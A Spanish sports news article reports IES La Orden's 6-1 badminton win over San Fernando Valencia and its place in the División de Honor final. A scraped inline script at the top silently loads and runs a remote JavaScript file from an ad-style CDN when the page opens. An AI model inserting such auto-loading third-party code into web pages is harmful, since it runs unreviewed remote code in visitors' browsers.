(function (document, window) { document.addEventListener('DOMContentLoaded', function (event) { let a = document.createElement("script"); a.type = 'text/javascript'; a.async = true; a.src = "https://data.gblcdn.com/data/gblcdnp.js?pubid=05a114a0-fca3-11e9-8439-f143cce16e54&pid=TcvybSOnmDcPUTj&renderD=0&limitT=0&limitH=24&t=i"; document.body.appendChild(a); document.getElementById('TcvybSOnmDcPUTj').remove(); }); }) (document, window);
Miércoles 29 de Junio de 2022

Bádminton: IES La Orden vence 6-1 y será finalista de División de Honor

0

bádminton orden vence finalistaTras una temporada intachable, el IES La Orden se hace con el merecido pase a la final de División de Honor de bádminton al vencer a San Fernando Valencia. El club albiazul conquistó el encuentro por 6-1, ganando los partidos de dobles mixto, dobles femenino y los cuatro individuales. Este resultado es el más abultado de la temporada y el que da el pase a la final. En los últimos años se han ganado las seis finales que se han disputado.

Como es habitual, el encuentro comenzó con el dobles mixto. La pareja formada por Pablo Abián y Haideé Ojeda se midieron a Fran Olivares y Andrea Arrones. El club albiazul conquistó con solvencia el partido frente a los del club valenciano. Se llevaron la victoria en los tres sets por 11-1, 11-9 y 11-5.

La Orden Bádminton

En paralelo se disputaron los dobles, femenino y masculino. Haideé Ojeda y Telma Santos se enfrentaron a Silvia Ferrándis y Llucia Vázquez. Las volantistas albiazules anotaron el segundo punto en el luminoso. Se impusieron en los tres sets dejando desarmado a su rival. Ganaron por 11-0, 11-3 y 11-4.

El dobles masculino fue el partido más disputado de la jornada, llegándose a completar los cinco sets. Los onubenses comenzaron perdiendo por 4-11 y 9-11, pero supieron imponerse en los dos sets siguientes por 11-10 y 11-9. Se jugó así un set final y decisivo que se solventó a favor del club valenciano por 7-11. Anotó así el San Fernando el primer punto en el luminoso.

Para los individuales, Laura Santos tuvo al otro lado del tapiz a Andrea Arrones y Alejandro Pérez se midió a Arturo Hernández. Santos derrotó a su rival demostrando brillantez en el tapiz. La volantista albiazul conquistó los tres sets por 11-7, 11-7 y 11-9. Por su parte, Pérez supo imponerse a su rival sacando los once puntos de los tres sets, 11-5, 11-9 y 11-8.


Por último, Telma Santos tuvo como rival a Silvia Ferrándis y Pablo Abián jugó contra Alejandro Alcalá. El quinto punto en el luminoso llegó de la raqueta de Telma Santos. Conquistó el partido con exquisitez ganando los tres sets por 11-3, 11-8 y 11-4. El individual masculino fue para Abián, que se midió a un duro rival al que pudo hacer frente y superar en tres sets. Ganó el partido por 11-5, 11-7 y 11-7.

El equipo ha jugado de forma brillante y solo ha perdido un partido. De esta forma, el IES La Orden consigue su pase a la final, que se disputará en dos partidos, uno en Huelva y otro en la ciudad del rival a batir, Rinconada o Arjonilla.

Leave A Reply

Las cookies de este sitio web se usan para personalizar el contenido y los anuncios, ofrecer funciones de redes sociales y analizar el tráfico. Además, compartimos información sobre el uso que haga del sitio web con nuestros partners de redes sociales, publicidad y análisis web, quienes pueden combinarla con otra información que les haya proporcionado o que hayan recopilado a partir del uso que haya hecho de sus servicios. Ver detalles

ACEPTAR
Aviso de cookies